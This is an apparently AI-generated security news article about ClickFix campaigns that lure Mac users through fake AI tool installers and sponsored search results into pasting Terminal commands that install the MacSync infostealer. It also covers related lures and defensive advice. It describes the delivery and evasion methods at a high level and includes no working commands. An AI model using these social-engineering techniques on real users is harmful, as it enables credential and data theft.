Ethical Hacking News
ClickFix campaigns are using fake AI tool installers to trick users into running malicious commands on their Macs, ultimately downloading and installing a macOS information stealer called MacSync. This new type of threat relies entirely on user interaction and has been linked to a series of malvertising campaigns targeting Google search results.
The ClickFix campaign uses social engineering tactics to deploy macOS information stealers. The campaigns trick users into running malicious commands on the Terminal app via fake AI tool installers and sponsored search results. The attackers are adapting their tactics to evade detection by traditional exploit-based attacks. The ClickFix campaign relies entirely on user interaction, making it a threat that can evade detection.
In recent months, a new type of threat has emerged that is leveraging social engineering tactics to deploy macOS information stealers, known as MacSync. These campaigns, dubbed "ClickFix," use fake AI tool installers to trick users into running malicious commands on the Terminal app, which ultimately downloads and installs the infostealer malware.
The ClickFix campaign was first discovered by Sophos researchers in November 2025, who found that it used the OpenAI Atlas browser as bait, delivered via sponsored search results on Google, to direct users to a fake Google Sites URL with a download button. When clicked, this button displayed instructions to open the Terminal app and paste a command to it, which then downloaded a shell script that prompts the user to enter their system password and runs MacSync with user-level permissions.
Since then, similar campaigns have been detected in December 2025 and February 2026, using malvertising and sponsored links tied to searches for queries like "how to clean up your Mac" on Google. These campaigns trick users into running malicious commands on the Terminal app by giving the impression that the links are safe.
The ClickFix campaign is particularly effective because it relies entirely on user interaction, making it a threat that can evade detection by traditional exploit-based attacks. Sophos researchers note that this method of deployment "makes it particularly effective against users who may not appreciate the implications of running unknown and obfuscated terminal commands."
Furthermore, the attackers are adapting their tactics to stay one step ahead of security tools, with the latest variant observed in the most recent campaign featuring dynamic AppleScript payloads and in-memory execution. This allows the malware to evade static analysis and behavioral detections.
The ClickFix campaign is part of a larger trend of malicious actors using social engineering tactics to trick users into installing infostealer malware like Amatera Stealer on Windows and Atomic Stealer on macOS. These campaigns often use legitimate platforms like Cloudflare Pages, Squarespace, and Tencent EdgeOne to host bogus instructions for installing developer tools.
Other threats that have been detected include a malicious traffic distribution system (TDS) named KongTuke, which uses compromised WordPress websites and fake CAPTCHA lures to deliver a Python-based trojan called ModeloRAT. This malware specifically checks whether a system is part of a corporate domain and identifies installed security tools before continuing.
In addition, other ClickFix-style pastejacking attacks have been detected in the wild, including campaigns that use compromised websites to display lures for ClickFix pages that mimic Google's "Aw Snap!" error or browser updates. Other tactics include using fake CAPTCHA verification lures on phony websites promoting a $TEMU airdrop scam to trigger the execution of a PowerShell command that runs arbitrary Python code.
The use of trusted platforms like WordPress and the exploitation of recently disclosed security flaws in WordPress plugins and themes have also been identified as potential entry points for these malicious campaigns. To counter this threat, site administrators are advised to keep their sites up-to-date, use strong passwords for administrative access, set up two-factor authentication (2FA), and scan for suspicious administrator accounts.
In conclusion, the ClickFix campaign represents a new type of threat that is leveraging social engineering tactics to deploy macOS information stealers. As security professionals continue to adapt to this evolving threat landscape, it is essential to stay vigilant and take proactive measures to protect against these types of attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Evolving-Threat-Landscape-A-Deep-Dive-into-ClickFix-Campaigns-and-Their-Malicious-Implications-ehn.shtml
https://thehackernews.com/2026/03/clickfix-campaigns-spread-macsync-macos.html
https://delimiter.online/blog/macsync-infostealer/
https://www.proofpoint.com/us/blog/threat-insight/amatera-stealer-rebranded-acr-stealer-improved-evasion-sophistication
https://cybersecuritynews.com/hackers-deliver-amatera-stealer/
https://www.bleepingcomputer.com/news/security/atomic-macos-infostealer-adds-backdoor-for-persistent-attacks/
https://www.picussecurity.com/resource/blog/atomic-stealer-amos-macos-threat-analysis
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Python/ModeloRAT!MSR
https://malware-guide.com/blog/remove-modelorat
https://isc.sans.edu/diary/32498
https://cybersecuritynews.com/fake-captcha/
https://letsdefend.io/blog/detecting-malicious-powershell-scripts
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/tracking-detecting-and-thwarting-powershell-based-malware-and-attacks
Published: Mon Mar 16 09:29:30 2026 by llama3.2 3B Q4_K_M
